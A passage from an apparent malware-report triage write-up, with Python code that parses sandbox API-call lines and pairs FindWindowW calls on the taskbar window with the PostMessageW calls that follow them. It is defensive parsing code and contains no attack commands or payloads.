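# Api.MODULE, optional "(args)", then "ref: XXXXXXXX".
API_LINE = re.compile(
    r"^\s*•\s*"
    r"(?:Part of subcall function (?P<caller>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<api>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?"
    r",?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)
HEX_ARG = re.compile(r"^[0-9A-Fa-f]{8}$")

# Window message constants from winuser.h (assumption outside the report).
WINDOW_MESSAGES = {0x0111: "WM_COMMAND"}


@dataclass
class ApiCall:
    api: str
    module: str
    args: list          # raw argument strings as printed in the report
    ref: int            # address of the call site
    subcall_of: Optional[int] = None  # set for "Part of subcall function" lines


def parse_api_lines(text):
    """Turn the report's API bullet lines into ApiCall records; skip other lines."""
    calls = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if not m:
            continue
        raw = m.group("args")
        args = [a.strip() for a in raw.split(",")] if raw else []
        caller = m.group("caller")
        calls.append(ApiCall(
            api=m.group("api"),
            module=m.group("module"),
            args=args,
            ref=int(m.group("ref"), 16),
            subcall_of=int(caller, 16) if caller else None,
        ))
    return calls


def arg_value(arg):
    """Eight hex digits are a numeric argument; anything else is a resolved string."""
    return int(arg, 16) if HEX_ARG.match(arg) else arg


def decode_post_message(call):
    """Name the PostMessageW parameters that the report resolved.

    The report may list fewer than four arguments, so only the parameters
    actually present are returned; 'message' is added when msg is known.
    """
    if call.api != "PostMessageW":
        raise ValueError(f"not a PostMessageW call: {call.api}")
    names = ["hwnd", "msg", "wparam", "lparam"]
    out = {name: arg_value(a) for name, a in zip(names, call.args)}
    if "msg" in out:
        out["message"] = WINDOW_MESSAGES.get(out["msg"], f"0x{out['msg']:04X}")
    return out


def find_shell_tray_commands(calls):
    """Pair each FindWindowW("Shell_TrayWnd") with the next top-level PostMessageW.

    Returns (find_ref, post_ref, decoded_parameters) per pair; subcall lines
    (the Sleep) are ignored so they do not break the sequence.
    """
    hits = []
    pending = None
    for c in calls:
        if c.subcall_of is not None:
            continue
        if c.api == "FindWindowW" and c.args[:1] == ["Shell_TrayWnd"]:
            pending = c
        elif c.api == "PostMessageW" and pending is not None:
            hits.append((pending.ref, c.ref, decode_post_message(c)))
            pending = None
    return hits


if __name__ == "__main__":
    for find_ref, post_ref, params in find_shell_tray_commands(parse_api_lines(SAMPLE_API_LINES)):
        print(f"FindWindowW@{find_ref:08X} -> PostMessageW@{post_ref:08X}: {params}")
```

Run against the constructed lines, the second pair decodes to hwnd 0, WM_COMMAND, wParam 0x197 (407), lParam 0, while the first pair yields only hwnd 0 because the report resolved nothing else for that call. The same parser can be pointed at other records in this report to pull out API sequences for triage rules without retyping addresses.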